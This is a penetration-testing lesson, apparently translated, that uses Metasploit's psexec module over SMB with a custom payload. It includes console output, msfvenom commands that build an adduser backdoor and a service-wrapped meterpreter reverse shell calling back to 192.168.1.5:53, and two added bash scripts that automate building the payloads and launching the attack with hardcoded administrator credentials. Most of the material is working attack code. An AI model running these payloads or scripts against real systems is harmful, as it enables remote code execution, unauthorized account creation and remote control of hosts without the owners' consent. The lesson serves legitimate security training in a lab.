MSF exploit modules support `set payload`, and in complex network environments many modules also accept a custom payload binary. That makes it easier to pair MSF with third-party frameworks such as Veil-Evasion, introduced in Lesson 11.

    The demo uses exploit/windows/smb/psexec.

    Attacker configuration:

    msf exploit(windows/smb/psexec) > show options

    Module options (exploit/windows/smb/psexec):

       Name                  Current Setting  Required  Description
       ----                  ---------------  --------  -----------
       RHOST                 192.168.1.119    yes       The target address
       RPORT                 445              yes       The SMB service port (TCP)
       SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
       SERVICE_DISPLAY_NAME                   no        The service display name
       SERVICE_NAME                           no        The service name
       SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
       SMBDomain             .                no        The Windows domain to use for authentication
       SMBPass               123456           no        The password for the specified username
       SMBUser               administrator    no        The username to authenticate as

    Payload options (windows/meterpreter/reverse_tcp):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.1.5      yes       The listen address (an interface may be specified)
       LPORT     53               yes       The listen port

    Exploit target:

       Id  Name
       --  ----
       0   Automatic

    [Lesson 97: Configuring a custom payload in MSF to control the target host - Figure 1]

    One option that is not among the usual ones must be set:

    msf exploit(windows/smb/psexec) > set EXE::CUSTOM /var/www/html/bin_tcp_x86_53.exe
    EXE::CUSTOM => /var/www/html/bin_tcp_x86_53.exe

    [Figure 2]

    Ports currently open on the target:

    [Figure 3]

    Run on the attacker:

    [Figure 4]

    Port changes on the target (an error is reported, but it does not affect execution):

    [Figure 5]

    Note:

    Psexec creates a service and uses it to run the executable (e.g. Micropoor.exe). When an executable runs as a service, though, the payload must accept commands from the Service Control Manager, otherwise it fails. So once psexec has created and started the service, the service is stopped again and the payload is left in a suspended state.

    See the source of the service template:

    https://github.com/rapid7/metasploit-framework/blob/master/data/templates/src/pe/exe/service/service.c

    A payload started this way exits after a short time: it is forcibly terminated.

    This parameter is therefore normally used for adduser, with the adduser payload, or with payloads that finish in a single run and need no persistent connection, such as a download or a plaintext password grab. It is not suitable for payloads that need a long-lived connection.

    root@John:/tmp# msfvenom -p windows/adduser 'PASS=Micropoor$123' USER=Micropoor -f exe > adduser.exe
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 279 bytes
    Final size of exe file: 73802 bytes

    The password value is quoted here on purpose: left unquoted, bash expands the $1 inside Micropoor$123 and the account is created with the password Micropoor23.
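The following script is an added example, not code from the lesson or from Metasploit. It builds both kinds of binary the note above distinguishes: the one-shot adduser.exe, and a meterpreter that survives being started as a service, produced with msfvenom's exe-service format, which wraps the payload in the service.c template linked above so the process answers the Service Control Manager before running the shellcode. It also includes a heuristic check that looks for the StartServiceCtrlDispatcher import name inside a file, useful before pointing EXE::CUSTOM at a binary built elsewhere. LHOST, LPORT and the output directory are assumed lab values taken from this page, the sample files in the demo step are constructed bytes rather than real binaries, and msfvenom must be on PATH for the build step.

```shell
#!/usr/bin/env bash
# Added example (not from the original lesson or from Metasploit): build the
# binaries that go into EXE::CUSTOM and check whether a binary is
# service-aware before handing it to psexec.
# Assumed lab values: LHOST/LPORT of the attacker box and the output
# directory, all taken from this page.
set -euo pipefail

LHOST="${LHOST:-192.168.1.5}"     # attacker address, as on this page
LPORT="${LPORT:-53}"              # attacker port, as on this page
OUT="${OUT:-/var/www/html}"       # where the page keeps bin_tcp_x86_53.exe

# A service started by psexec is killed by the Service Control Manager unless
# the process calls StartServiceCtrlDispatcher soon after start.  The PE import
# table stores imported function names as plain ASCII, so a byte-level search
# for that name is a cheap heuristic for telling a service-wrapped binary from
# a plain one.  Returns 0 if the name is present, 1 otherwise.
is_service_aware() {
    grep -aq 'StartServiceCtrlDispatcher' "$1"
}

# Prints "service-aware" or "plain" for a file.
classify() {
    if is_service_aware "$1"; then
        echo "service-aware"
    else
        echo "plain"
    fi
}

# One-shot payload: acceptable in EXE::CUSTOM without a service wrapper,
# because it finishes before the SCM times the service out.  The password is
# single-quoted so the shell does not expand the $1 inside it.
build_adduser() {
    msfvenom -p windows/adduser USER=Micropoor 'PASS=Micropoor$123' \
        -f exe -o "$OUT/adduser.exe"
}

# Long-lived payload: -f exe-service wraps it in Metasploit's service template
# (the service.c linked above), so the process talks to the SCM and then runs
# the payload instead of being terminated.
build_service_meterpreter() {
    msfvenom -p windows/meterpreter/reverse_tcp \
        LHOST="$LHOST" LPORT="$LPORT" -f exe-service \
        -o "$OUT/bin_tcp_x86_${LPORT}.exe"
}

case "${1:-}" in
    build)
        build_adduser
        build_service_meterpreter
        classify "$OUT/adduser.exe"
        classify "$OUT/bin_tcp_x86_${LPORT}.exe"
        ;;
    demo)
        # Constructed sample inputs, not real binaries: just enough bytes for
        # the heuristic to show the difference between the two kinds of file.
        tmp="$(mktemp -d)"
        printf 'MZ ADVAPI32.dll StartServiceCtrlDispatcherA' > "$tmp/svc.exe"
        printf 'MZ plain stub without service imports' > "$tmp/plain.exe"
        classify "$tmp/svc.exe"     # service-aware
        classify "$tmp/plain.exe"   # plain
        ;;
esac
```

Run it as ./build_custom_payload.sh build on the attacker, or ./build_custom_payload.sh demo to see the classifier on the constructed samples. The adduser binary is expected to classify as plain, which is fine for that payload: it does not need the wrapper, for the reason the note above gives.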

    [Figure 6]

    The Service Control Manager's requirement that the process accept its commands can also be worked around by changing the target.

    Attacker settings:

    msf exploit(windows/smb/psexec) > show targets

    Exploit targets:

       Id  Name
       --  ----
       0   Automatic
       1   PowerShell
       2   Native upload
       3   MOF upload

    msf exploit(windows/smb/psexec) > set target 2
    target => 2
    msf exploit(windows/smb/psexec) > exploit
    [*] Started reverse TCP handler on 192.168.1.5:53
    [*] 192.168.1.119:445 Connecting to the server...
    [*] 192.168.1.119:445 Authenticating to 192.168.1.119:445 as user 'administrator'...
    [*] 192.168.1.119:445 Uploading payload... kKwZpPRs.exe
    [*] 192.168.1.119:445 Using custom payload /var/www/html/bin_tcp_x86_53.exe, RHOST and RPORT settings will be ignored!
    [*] 192.168.1.119:445 Created kKwZpPRs.exe...
    [-] 192.168.1.119:445 Unable to remove the service, ERROR_CODE:
    [-] 192.168.1.119:445 Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_PIPE_EMPTY
    [*] Exploit completed, but no session was created.

    [Figure 7]

    Target host:

    [Figure 8]

    Then simply run the payload.
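As an added example (not from the lesson, and not Metasploit's own tooling), the script below captures the target-based variant of the procedure as a reusable wrapper: it writes the psexec resource script with the target id from show targets and EXE::CUSTOM set, sanity-checks the handler against the custom exe, and starts msfconsole with it. It assumes the lab values from this page for RHOST, SMBUser and SMBPass; that the custom exe was built for the LHOST/LPORT passed to write_rc (the module prints that RHOST and RPORT settings are ignored for a custom payload, so the payload options now only configure the handler, which has to match what msfvenom baked into the file); and the file-name convention bin_tcp_x86_<LPORT>.exe used on this page. Newer Metasploit versions spell the host option RHOSTS.

```shell
#!/usr/bin/env bash
# Added example, not from the original lesson: run exploit/windows/smb/psexec
# with a custom binary from a generated resource script.
# Assumptions: RHOST/SMBUser/SMBPass are the lab values on this page; the
# custom exe was built with the LHOST/LPORT given to write_rc; the file name
# follows this page's bin_tcp_x86_<LPORT>.exe convention; newer Metasploit
# versions name the host option RHOSTS instead of RHOST.
set -euo pipefail

# Print a msfconsole resource script.
#   $1 custom exe path (EXE::CUSTOM)
#   $2 target id from "show targets": 0 Automatic, 1 PowerShell,
#      2 Native upload, 3 MOF upload
#   $3 LHOST baked into the exe   $4 LPORT baked into the exe
write_rc() {
    local exe="$1" target="$2" lhost="$3" lport="$4"
    # With EXE::CUSTOM set the module uploads our file instead of generating
    # one, so PAYLOAD/LHOST/LPORT here only configure the handler and must
    # match what msfvenom baked into the exe.  "exploit -j" keeps the handler
    # running as a job for the session the uploaded binary calls back to.
    cat <<EOF
use exploit/windows/smb/psexec
set RHOST 192.168.1.119
set SMBDomain .
set SMBUser administrator
set SMBPass 123456
set target $target
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set EXE::CUSTOM $exe
exploit -j
EOF
}

# Read the value of one "set NAME value" line back out of a script.
rc_value() {
    local rc="$1" name="$2"
    printf '%s\n' "$rc" | awk -v k="$name" '$1 == "set" && $2 == k { print $3 }'
}

# Refuse to launch when the exe is missing or the handler port disagrees with
# the port encoded in the file name (bin_tcp_x86_<LPORT>.exe, the assumed
# naming convention).  Returns 0 when everything is consistent.
preflight() {
    local exe="$1" rc="$2"
    [ -f "$exe" ] || { echo "missing custom exe: $exe" >&2; return 1; }
    local want="${exe##*_}"
    want="${want%.exe}"
    [ "$(rc_value "$rc" LPORT)" = "$want" ] || {
        echo "handler LPORT does not match $exe" >&2; return 1; }
}

# Generate, check, and hand the script to msfconsole (requires Metasploit).
run_psexec() {
    local exe="$1" rc_text rc_file
    rc_text="$(write_rc "$@")"
    preflight "$exe" "$rc_text"
    rc_file="$(mktemp)"
    printf '%s\n' "$rc_text" > "$rc_file"
    msfconsole -q -r "$rc_file"
}

case "${1:-}" in
    run)  run_psexec "${EXE:-/var/www/html/bin_tcp_x86_53.exe}" \
                     "${TARGET:-2}" "${LHOST:-192.168.1.5}" "${LPORT:-53}" ;;
    show) write_rc   "${EXE:-/var/www/html/bin_tcp_x86_53.exe}" \
                     "${TARGET:-2}" "${LHOST:-192.168.1.5}" "${LPORT:-53}" ;;
esac
```

Use ./psexec_custom.sh show to inspect the generated script, and TARGET=2 ./psexec_custom.sh run to reproduce the Native upload attempt above; the errors the page shows after "Created ..." come from the module's service cleanup, which is why the handler is started as a job and left running for the payload to connect back.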

    Micropoor